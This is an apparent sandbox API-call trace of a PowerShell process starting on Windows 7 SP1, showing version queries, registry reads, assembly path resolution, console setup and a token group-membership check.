	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12eeb7c, puLen=0x14eb90) returned 1
	[0087.151] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0087.151] lstrcpyW (in: lpString1=0x361778, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12eebf8, puLen=0x14eb90) returned 1
	[0087.151] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0087.151] lstrcpyW (in: lpString1=0x361778, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x12ee8a0, puLen=0x14eb90) returned 1
	[0087.151] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0087.151] lstrcpyW (in: lpString1=0x361778, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x0, puLen=0x14eb90) returned 0
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x0, puLen=0x14eb90) returned 0
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x14eb94, puLen=0x14eb90 | out: lplpBuffer=0x14eb94*=0x0, puLen=0x14eb90) returned 0
	[0087.151] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x14eb88, puLen=0x14eb84 | out: lplpBuffer=0x14eb88*=0x12ee848, puLen=0x14eb84) returned 1
	[0087.151] VerLanguageNameW (in: wLang=0x0, szLang=0x361778, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0087.152] VerQueryValueW (in: pBlock=0x12ee7ac, lpSubBlock="\\", lplpBuffer=0x14eb9c, puLen=0x14eb98 | out: lplpBuffer=0x14eb9c*=0x12ee7d4, puLen=0x14eb98) returned 1
	[0087.157] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.157] GetLastError () returned 0xcb
	[0087.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.159] GetLastError () returned 0xcb
	[0087.162] lstrlenW (lpString="䅁") returned 1
	[0087.166] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb60 | out: phkResult=0x14eb60*=0x29c) returned 0x0
	[0087.166] RegOpenKeyExW (in: hKey=0x29c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb64 | out: phkResult=0x14eb64*=0x2a0) returned 0x0
	[0087.166] RegOpenKeyExW (in: hKey=0x2a0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14eb98 | out: phkResult=0x14eb98*=0x2a4) returned 0x0
	[0087.168] RegQueryValueExW (in: hKey=0x2a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ebd8, lpData=0x0, lpcbData=0x14ebd4*=0x0 | out: lpType=0x14ebd8*=0x1, lpData=0x0, lpcbData=0x14ebd4*=0x56) returned 0x0
	[0087.169] RegQueryValueExW (in: hKey=0x2a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ebd8, lpData=0x361778, lpcbData=0x14ebd4*=0x56 | out: lpType=0x14ebd8*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ebd4*=0x56) returned 0x0
	[0087.171] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.171] GetLastError () returned 0x0
	[0087.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.173] GetLastError () returned 0x0
	[0087.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.190] GetLastError () returned 0x0
	[0087.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.199] GetLastError () returned 0xcb
	[0087.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0087.369] GetLastError () returned 0x2
	[0087.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0087.369] GetLastError () returned 0x2
	[0087.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.439] GetLastError () returned 0xcb
	[0087.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.440] GetLastError () returned 0xcb
	[0087.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.464] GetLastError () returned 0xcb
	[0087.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.465] GetLastError () returned 0xcb
	[0087.465] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.465] GetLastError () returned 0xcb
	[0087.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0087.577] GetLastError () returned 0x0
	[0087.577] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0087.577] GetLastError () returned 0x0
	[0087.590] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.590] GetLastError () returned 0xcb
	[0087.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0087.591] GetLastError () returned 0xcb
	[0087.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.629] GetLastError () returned 0x7e
	[0087.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0087.629] GetLastError () returned 0x7e
	[0087.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0087.823] GetLastError () returned 0x2
	[0087.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0087.823] GetLastError () returned 0x2
	[0087.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0087.870] GetLastError () returned 0x57
	[0087.870] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0087.870] GetLastError () returned 0x57
	[0087.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0087.933] GetLastError () returned 0x2
	[0087.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0087.933] GetLastError () returned 0x2
	[0088.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0088.023] GetLastError () returned 0x2
	[0088.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0088.023] GetLastError () returned 0x2
	[0088.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.039] GetLastError () returned 0xcb
	[0088.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e768, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.039] GetLastError () returned 0xcb
	[0088.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.039] GetLastError () returned 0xcb
	[0088.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.039] GetLastError () returned 0xcb
	[0088.041] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.041] GetLastError () returned 0xcb
	[0088.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x14e6ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0088.066] GetLastError () returned 0x2
	[0088.066] SetErrorMode (uMode=0x1) returned 0x1
	[0088.066] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x14eb54 | out: lpFileInformation=0x14eb54*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0088.066] GetLastError () returned 0x2
	[0088.066] SetErrorMode (uMode=0x1) returned 0x1
	[0088.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e768, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.172] GetLastError () returned 0x0
	[0088.172] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.172] GetLastError () returned 0x0
	[0088.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e718, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.173] GetLastError () returned 0x0
	[0088.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.176] GetLastError () returned 0xcb
	[0088.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.178] GetLastError () returned 0xcb
	[0088.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.178] GetLastError () returned 0xcb
	[0088.179] CoCreateGuid (in: pguid=0x14ec34 | out: pguid=0x14ec34*(Data1=0x8a4349ac, Data2=0xb6a1, Data3=0x4017, Data4=([0]=0x8f, [1]=0xd9, [2]=0xd3, [3]=0x79, [4]=0x5a, [5]=0x19, [6]=0x7, [7]=0xe7))) returned 0x0
	[0088.181] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.182] GetLastError () returned 0xcb
	[0088.183] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.183] GetLastError () returned 0xcb
	[0088.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.184] GetLastError () returned 0xcb
	[0088.189] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0088.190] GetLastError () returned 0x0
	[0088.191] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x14eb14 | out: lpConsoleScreenBufferInfo=0x14eb14) returned 1
	[0088.191] GetLastError () returned 0x0
	[0088.195] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0088.195] GetLastError () returned 0x0
	[0088.195] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x14eb14 | out: lpConsoleScreenBufferInfo=0x14eb14) returned 1
	[0088.195] GetLastError () returned 0x0
	[0088.195] GetVersionExW (in: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x361790*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0088.195] GetLastError () returned 0x0
	[0088.197] GetCurrentProcess () returned 0xffffffff
	[0088.197] GetLastError () returned 0x3f0
	[0088.198] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x14eb24 | out: TokenHandle=0x14eb24*=0x2c0) returned 1
	[0088.198] GetLastError () returned 0x3f0
	[0088.200] GetTokenInformation (in: TokenHandle=0x2c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14eb7c | out: TokenInformation=0x0, ReturnLength=0x14eb7c) returned 0
	[0088.200] GetLastError () returned 0x7a
	[0088.200] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x367510
	[0088.200] GetLastError () returned 0x7a
	[0088.201] GetTokenInformation (in: TokenHandle=0x2c0, TokenInformationClass=0x8, TokenInformation=0x367510, TokenInformationLength=0x4, ReturnLength=0x14eb7c | out: TokenInformation=0x367510, ReturnLength=0x14eb7c) returned 1
	[0088.201] GetLastError () returned 0x7a
	[0088.202] DuplicateTokenEx (in: hExistingToken=0x2c0, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x14eb34 | out: phNewToken=0x14eb34*=0x2b8) returned 1
	[0088.202] GetLastError () returned 0x7f
	[0088.202] GetTokenInformation (in: TokenHandle=0x2c0, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x14eb7c | out: TokenInformation=0x0, ReturnLength=0x14eb7c) returned 0
	[0088.202] GetLastError () returned 0x7a
	[0088.202] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3674f0
	[0088.202] GetLastError () returned 0x7a
	[0088.202] GetTokenInformation (in: TokenHandle=0x2c0, TokenInformationClass=0x8, TokenInformation=0x3674f0, TokenInformationLength=0x4, ReturnLength=0x14eb7c | out: TokenInformation=0x3674f0, ReturnLength=0x14eb7c) returned 1
	[0088.202] GetLastError () returned 0x7a
	[0088.203] CheckTokenMembership (in: TokenHandle=0x2b8, SidToCheck=0x1371618*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x14eb10 | out: IsMember=0x14eb10) returned 1
	[0088.203] GetLastError () returned 0x7a
	[0088.203] CloseHandle (hObject=0x2b8) returned 1
	[0088.203] GetLastError () returned 0x7a
	[0088.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e624, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.203] GetLastError () returned 0x7a
	[0088.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.203] GetLastError () returned 0x7a
	[0088.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.203] GetLastError () returned 0x7a
	[0088.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.204] GetLastError () returned 0x7a
	[0088.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e624, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.221] GetLastError () returned 0x7a
	[0088.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.221] GetLastError () returned 0x7a
